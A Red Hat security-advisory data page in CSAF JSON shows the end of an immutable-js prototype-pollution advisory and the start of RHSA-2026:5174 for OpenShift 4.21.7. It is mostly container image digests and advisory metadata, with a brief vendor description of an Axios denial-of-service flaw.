"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:ad1094291b455efbcb67c99059f25aa0c324a8ea57f1b4917995ca8daefe602d_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:1903cc91969e1e9a9d90676abbaf6a13af2644ab4678c4354cc4c436c7d73320_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:6eaae5bbd36db4137748ce56b9bdb89440d46cf33e44deb7886742151a926233_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:ad396a22c7dfc18d3755b5226322b02cf53e9d889d8c4c0fd9f3fc18640d5229_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:f4e156751bf139839b078a9ed28ac273209573d752850d2191cf523168ecef3c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:3aa5791c30722dc9a41b11af0e6165b16e1fbb90f9223402f15ccd1b3ab87bcb_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:61aca1200e3f76ad5608ec2fea60192281cfd8dc883ca95a952d4634b362b28d_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:74d46cd69f0ea430d4f64bb7eb2c7801552fd75180bd174afba4280202487a9b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:d69c9156ba667438e59cb8c71a905fd92a26e830629a5c20223d70173a64a95b_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:79bbb4f57c6b596c4926a8bc3a8fb9f885f05251a6c93a903622ea18ed77f224_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:ac44ed8760e5bf9d701b3cf4296805d1df6f6b9cb57b3e0a7557239de1a542b7_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:b0c796e0d0eea701ebcb55c646042a020d71e18595e260644884596b04dd1def_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:d47167421192458b70433c97afbee742ede2a650c7af0ce54b126fa251cc1ea7_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:1ab0fe650316e0640421fbc361eae235c4a0175c7467acd5e8ad414a8fd1fc75_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:4355c558ed342b1e96f4b23c53b229d22ef4ee48378980eb7359d7864e15fe6d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:b496e4274643266a37d7ba7134f71e3aa262df65e4c04b9148ee9d7a67da669a_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:ddda8b74fb8cbde98a90fc89c62608dce08a022c0e63ae90a1a0b52123da1c2c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:36b56d6b9609512532fdae217b892ebc40ce774161e6f90176b052cf7ee686a3_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:575cb613c7cc81507a3e6235e30b0ffbb34f145e2bb6b97632d68ed5e73fd090_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:a8d65fb8b81be9613bc732f696ef245aad46a23335de455d258598dd86c19f8d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:e9d6ed28fbbe6a3aeb2050c6e8fc3f8a5b6cc7546ee996006e92031294f83d2f_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:4943997b1fed0e8fada897f8296fafd2ec82c69d51f0779b0f1591c9ce2dcc2a_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:7f98a0535715ba9925f93f16c41fc2cfdc16ee8fb32654336f7c5a09b0e7d9dd_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:896deef9b7467a814e9e79a4366da9daf969b2c260ec30a517dfa30887e10205_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:a520297678ce3bd9a01a1e64b41833535d30ba469e55f26c462af1303c0f959d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:4100f29f8a8ba48956cc570cc2a65bc38b9fffa9b946fc3c6253bd0a54f25065_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:850c60717c0c3a8cdc7bb742721e73dbcd8928443fb6776003e3ca71fdd17982_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:c9e8a0a70d60dd717a2f9c8018f1ce963ce25079476a64e8743e826e616ffb00_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:d7dd81c6f47faf4e07602dfed2229b27d8064d8180009b4bc62189030575d421_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:6a25acbc7851fdb9ab19d6f3286e50db85f07064f59a604aedaff48800b06572_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c02087ae03cff78d4a3fba8887ef55d33cd00a8f2f74806368bf683fa73c0e46_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c95f5edf4111dc9077d07c0c81df6fc238c6d048d22793f83f7be08bc673b9d3_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:d2cc92420cffc159ce7f27104ba9e49745198e9e3314683209624e4a1a3f041a_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:55928ce9d57439303297ac900fc0b4f95de64ee691a332a21995cf09342c1aff_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:d2949213c7c3f93b0b59082ecdc69f4e05b8038a43afc216926ec43714a73346_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fb49af7cc738943c59aef8a8b860b00f5e854cc95d58a88461c30ebea0f329c3_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fff7cebbf5360ae8830e3650f72b5c269be15b9892848f0a3408ed47abb5a5ad_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:4d8f346ef3bffeed12b3c64e5ebed22f8d79397e915c0bfbbc5bf03ee809c0a0_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:913120c0fc826c2f8ed1f2cba5e71c91e2c440e50be043ab912d688b230aa0fb_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:c3633df794c0803b27d8607d1391eb66af8c104712584ba326d04e4cae8627d6_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:d57138c750131113f09ce1259f5702a0d4b984fb29d5d7994c5dc4ad6aaaf39b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:1766984333b3b3d1d1614bafef596fb94351b3358e04e32d46e20752b60a0d9e_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:17c676d8e456102d877a7feee97c7164ee9f71e21763c5561bed8ac24e5dc2d0_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:9e94ed8885a79d3c7ca3a41ffba43455b410435ea0090fb5c6598eefc5156b22_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:b078e01e6a3d6a04c2e364d42aa4a5be37bb2aa279ae484c524ae58293aacc3a_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:8edafac72bd8526384c33b749595be0986d86957b79ac7ac7ae37b435f27351e_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9532ce55aa8e3553bd102a891ca6e2b6cf93f23da41c71ba184e769dd1328410_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9d146a6192bc9251ceb9443e32c708cfbb7cd542f6d9621c1dbbbdff50ede9ae_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:e227cdab2e061d70761d510b0d9c99b4dcf735d0257809c6757155ef18bb341f_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:62fd673d06de31af8b7946b6eb657c69e064dc1e8639197e689375be3a331c90_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:bb9014907e1d57647589efe637bf133e631d03ac94e1c30181eccf6ea8bddc6b_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:d81f2ab37bd8c6e5aaccd0ed2b94fbc2bf88934f3ffda8fde7add64b9f051966_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:dad80c9983167fb8fd98912c890b3a1dbcac2cbadf417c7771a3fda2f23f832c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:4be015b2648cd7f4edb2aa29521f283959db8336ce4df5497ad8465a031bd3c4_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:758c0f95e9895b61a86e3ff4f4c2570f278c7af13ad3a5876d785829b746bf42_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:9082cef0cbf513a3c33309be5e83774cf92ddae6045c571f43718583da451d8d_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:f1f8475bacfa68df75fa015dfd7fb73565ed2b0b73fe8eeec26c2831862d7175_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:11e40e57f6d48e0eba7e4ed12f4ef55b84ec9f93d2534712318d259dc4fcf4a5_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:132e7098ba9e2ac1e02e04e828359073ecc322a5e9e804badb1e0e5934ff32fe_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:3cdd76fda529eb46161cac023a40b1420d85cfe6ac9100986796e4f49ea5e7c2_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:7805f6d13f8a8a1309c2821622706e0e81c6b0a99f18ca761f031937d67fd484_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:1b8f3645dca1f463be8be4f3bbde53cfb0a28412ddc7f20eed9e39b4f7f02979_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:31b3f532cfa55e76563251f01008c9998b71ba33a4dd75c3307db32173d6ff39_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5a063e1f8a5d0ff90f7c948f332fff502fc00be8ede14bd0ef4b38ab09717c72_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5cde57462724bc2ebd303b29d6127d2fdffcd4c4b93ea443eb6ac55290031960_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:45ef14cb6ce30aaf3780fbb5656dae822825b892e165469c0c732e613f452c94_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:9460807bdb775b166264de2b0a5eb348b144cb9a7a0b1d42190a3ce54bea8d63_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:97bb4216555694418e609366ecb47bd1c8336c1e97e76039df4949c5be4fb997_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:b9bc631124b8d4f95faf4de518915fc8bd519edf11055b703ee223c0c4813b52_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:05689e767759be2e46620c752e079847fad0941193456dad22ed33111e69f44c_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:18b0f392942a743b23dc4db9ccccaf467053e70bdad97f1714d0d413f66eaf71_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:32e1fac10eb855484152f41d6a2e4b3fa6fb9c63afd10c5d546db29916f40816_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:c0aeadd784317f5d0a5415bb2002ab6116f2c947c00fc8df9e2a91e907e108bf_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:24c9f0cb19b5e95ee037583eff0c5e683c98d65868f57221e36db1fe1aaad96b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:4def0b462d24131336a8f641edf6206d9eac005b61d1abd3739b549e74794ee9_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:659a041590140f69a2a0952769a53240e12d770cb7440fc0ac1af4198470e684_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:fd72d5e49c2d10e1ccb16547ee8563ad5c1c4a09960f6c3563b8f394e031c50e_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:2ff4c94a03c71dc68b519db391d0b7f9787e7709df2e5d16aa837fcf522418de_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:b98f70827db37e91dc99336043552d1375cd94a7bbab3c0abcfa7f7d33b3d3d6_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:e7adcd557f69ccf4893c0f40b5ccb19264a401ea98436b5072d1b7593d120bc4_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:eeaf14966d50a750a665ef6304f3ca82b50c0cfe147acf796714ddd0642d51f2_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:126b982ac1e4ca447773a3c9099691f0ad5dca0d7a4101877724421d613c459b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:548fe802bc62d3ff20ee0b13dcd9792eb304f11d5d496562ad1c2d80b5796c67_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:772e9e4da783b4d33ff1846a6b8fc9ab7acefe76dd21eb3030c83f6352050894_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:d6622aa3381f9ac73e6f3c9764ffe357a434d021c62d20d5a95ebb586b66d87b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:08ffacc73e8bdd40fbd4e913971eb1621a09329c85ec123e1781c08515cf3b5a_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:174f055bd042d6ec4e056ef9f6bb430f0b7e68211ee56155aee1d02f6b26a53a_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:4248348b507e9a78095ffa9d7a2ef4ff87880f65fdfc8ae71e67018655705c53_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:de69889c3af110ae6613401431a384781ece6f82bbe2933b81dedef602be9005_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "immutable-js: Immutable.js: Arbitrary code execution via Prototype Pollution"
}
]
}
RHSA-2026:5174
Vulnerability from csaf_redhat - Published: 2026-03-24 14:21 - Updated: 2026-04-16 10:29A denial of service flaw has been discovered in the Axios npm package. the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.
| URL | Category | ||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Red Hat OpenShift Container Platform release 4.21.7 is now available with updates to packages and images that fix several bugs and add enhancements.\n\n This release includes a security update for Red Hat OpenShift Container Platform 4.21.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat OpenShift Container Platform is Red Hat\u0027s cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.\n\nThis advisory contains the container images for Red Hat OpenShift Container Platform 4.21.7. See the following advisory for the RPM packages for this release:\n\nhttps://access.redhat.com/errata/RHBA-2026:5147\n\nSpace precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes:\n\nhttps://docs.redhat.com/en/documentation/openshift_container_platform/4.21/html/release_notes/",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:5174",
"url": "https://access.redhat.com/errata/RHSA-2026:5174"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-25639",
"url": "https://access.redhat.com/security/cve/CVE-2026-25639"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/",
"url": "https://access.redhat.com/security/updates/classification/"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_5174.json"
}
],
"title": "Red Hat Security Advisory: OpenShift Container Platform 4.21.7 bug fix and security update",
"tracking": {
"current_release_date": "2026-04-16T10:29:26+00:00",
"generator": {
"date": "2026-04-16T10:29:26+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.7.5"
}
},
"id": "RHSA-2026:5174",
"initial_release_date": "2026-03-24T14:21:18+00:00",
"revision_history": [
{
"date": "2026-03-24T14:21:18+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-03-24T14:22:31+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-04-16T10:29:26+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat OpenShift Container Platform 4.21",
"product": {
"name": "Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift:4.21::el9"
}
}
}
],
"category": "product_family",
"name": "Red Hat OpenShift Container Platform"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-agent-installer-ui-rhel9@sha256:9490248af37278e0b107eef719bea4e4b14e2840f42d5d31c0a546efb9a16ab8_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-ui-rhel9@sha256:9490248af37278e0b107eef719bea4e4b14e2840f42d5d31c0a546efb9a16ab8_amd64",
"product_id": "registry.redhat.io/openshift4/ose-agent-installer-ui-rhel9@sha256:9490248af37278e0b107eef719bea4e4b14e2840f42d5d31c0a546efb9a16ab8_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-agent-installer-ui-rhel9@sha256%3A9490248af37278e0b107eef719bea4e4b14e2840f42d5d31c0a546efb9a16ab8?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773845978"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:1432f3b24284b174dd6c69fc6170eb2952ddd29d8eeb976911c5f0ddb3e2e21b_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:1432f3b24284b174dd6c69fc6170eb2952ddd29d8eeb976911c5f0ddb3e2e21b_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:1432f3b24284b174dd6c69fc6170eb2952ddd29d8eeb976911c5f0ddb3e2e21b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-autoscaler-rhel9@sha256%3A1432f3b24284b174dd6c69fc6170eb2952ddd29d8eeb976911c5f0ddb3e2e21b?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849291"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:0670c2bb289901d477fbc283a5aea07cd38d7a7e19b16a9ac16f681bc94b2c62_amd64",
"product": {
"name": "registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:0670c2bb289901d477fbc283a5aea07cd38d7a7e19b16a9ac16f681bc94b2c62_amd64",
"product_id": "registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:0670c2bb289901d477fbc283a5aea07cd38d7a7e19b16a9ac16f681bc94b2c62_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/aws-karpenter-provider-aws-rhel9@sha256%3A0670c2bb289901d477fbc283a5aea07cd38d7a7e19b16a9ac16f681bc94b2c62?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849087"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:2ecec54cb74d1a34486e71b455886ca4a88ee3b4f3e21fba7d7e3d17b00179fc_amd64",
"product": {
"name": "registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:2ecec54cb74d1a34486e71b455886ca4a88ee3b4f3e21fba7d7e3d17b00179fc_amd64",
"product_id": "registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:2ecec54cb74d1a34486e71b455886ca4a88ee3b4f3e21fba7d7e3d17b00179fc_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/aws-kms-encryption-provider-rhel9@sha256%3A2ecec54cb74d1a34486e71b455886ca4a88ee3b4f3e21fba7d7e3d17b00179fc?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846847"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:c87863f0cd97c592cc54c1fc2ab9fbe1468d6302763eaa7a6530af059382d797_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:c87863f0cd97c592cc54c1fc2ab9fbe1468d6302763eaa7a6530af059382d797_amd64",
"product_id": "registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:c87863f0cd97c592cc54c1fc2ab9fbe1468d6302763eaa7a6530af059382d797_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-azure-file-csi-driver-rhel9@sha256%3Ac87863f0cd97c592cc54c1fc2ab9fbe1468d6302763eaa7a6530af059382d797?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773845750"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:8a69bf9f6b9f8e3dc685d704d31b4a4eded70bdf33ed57dfa8768c016faae46a_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:8a69bf9f6b9f8e3dc685d704d31b4a4eded70bdf33ed57dfa8768c016faae46a_amd64",
"product_id": "registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:8a69bf9f6b9f8e3dc685d704d31b4a4eded70bdf33ed57dfa8768c016faae46a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-azure-file-csi-driver-operator-rhel9@sha256%3A8a69bf9f6b9f8e3dc685d704d31b4a4eded70bdf33ed57dfa8768c016faae46a?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844614"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:48d9d26f06bc34472304b35f6559e428bd1d599267d1298ccf2b199533af4749_amd64",
"product": {
"name": "registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:48d9d26f06bc34472304b35f6559e428bd1d599267d1298ccf2b199533af4749_amd64",
"product_id": "registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:48d9d26f06bc34472304b35f6559e428bd1d599267d1298ccf2b199533af4749_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/azure-kms-encryption-provider-rhel9@sha256%3A48d9d26f06bc34472304b35f6559e428bd1d599267d1298ccf2b199533af4749?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844452"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:9df1f434a7eae17b9e335feb35d3cad8d15887bc55d2f20c8720ac17633e88f5_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:9df1f434a7eae17b9e335feb35d3cad8d15887bc55d2f20c8720ac17633e88f5_amd64",
"product_id": "registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:9df1f434a7eae17b9e335feb35d3cad8d15887bc55d2f20c8720ac17633e88f5_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-baremetal-machine-controllers-rhel9@sha256%3A9df1f434a7eae17b9e335feb35d3cad8d15887bc55d2f20c8720ac17633e88f5?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844519"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:27d6d5aea37e0e535d3db14419f53b898251476c64e9f41f00d2afc308d22293_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:27d6d5aea37e0e535d3db14419f53b898251476c64e9f41f00d2afc308d22293_amd64",
"product_id": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:27d6d5aea37e0e535d3db14419f53b898251476c64e9f41f00d2afc308d22293_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-baremetal-runtimecfg-rhel9@sha256%3A27d6d5aea37e0e535d3db14419f53b898251476c64e9f41f00d2afc308d22293?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848375"
}
}
},
{
"category": "product_version",
